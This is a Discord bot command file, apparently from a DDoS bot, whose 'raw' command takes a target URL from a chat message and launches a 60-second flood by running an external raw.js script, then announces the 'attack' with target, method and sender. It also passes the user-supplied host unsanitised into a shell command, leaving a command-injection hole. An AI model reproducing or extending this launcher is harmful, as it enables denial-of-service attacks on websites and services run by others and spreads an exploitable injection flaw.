const Discord = require("discord.js");

exports.run = async (client, message, args) => {

const host = message.content.split (" ")[1]
const time = message.content.split (" ")[2]
const ayarlar = require('../ayarlar.json');
var room = ayarlar.commandroom;

if (message.channel.id != room) {
	return;
  }

// Example command
if(!args[0]) {
	const embed1 = new Discord.MessageEmbed()
	.setColor('RANDOM')
	.setTitle('*Help*')
	.setDescription("```Ex ,RAW https://example.com/```")
	.setFooter("Time Max 60s!")
	message.channel.send(embed1);
	return;
	}

// Command attack
var exec = require('child_process').exec
exec(`node raw.js ${host} 60 raw 30`, (error, stdout, stderr) => {
});

// Start Attacking
setTimeout(function(){ 
    console.log('Start Attacking ID Discord:' +  message.guild.id)

const embed = new Discord.MessageEmbed()
	.setColor('RANDOM')
	.setTitle(' **🚀Producer - Hoàng T - Bot🚀** ')
	.setTimestamp()
	.setDescription("**Target**: \n `[ " + host + " ]` \n**Method**: \n `[ RAW ]` \n**Time**: \n `[  60  ]`\n**Send Attack By**: \n `[ " + [message.author.username] + " ]`")
	.setFooter('Bot By ThaiDev')
	.setTimestamp()
	.setThumbnail("")
 message.channel.send(embed);
 }, 5000); //time in milliseconds 1000 milliseconds = 1 seconds

// Verify Gif
// Start Verify
console.log('Start Verify ID Discord:' +  message.guild.id)
const embed = new Discord.MessageEmbed()
	.setColor('RANDOM')
	.setTitle(' **🌪️Producer - Hoàng T - Bot🌪️** ')
	.setTimestamp()
	.setDescription("```Loading...🔁```")
	.setFooter('© Developer: ThaiDev', client.user.avatarURL)
	.setTimestamp()
	.setThumbnail("")
 message.channel.send(embed);
  }


exports.conf = {
  enabled: true,
  guildOnly: false,
  aliases: ['raw'],
  permLevel: 0
}

exports.help = {
  name: 'raw',
  description: 'zxcr9999',
  usage: 'raw'
}
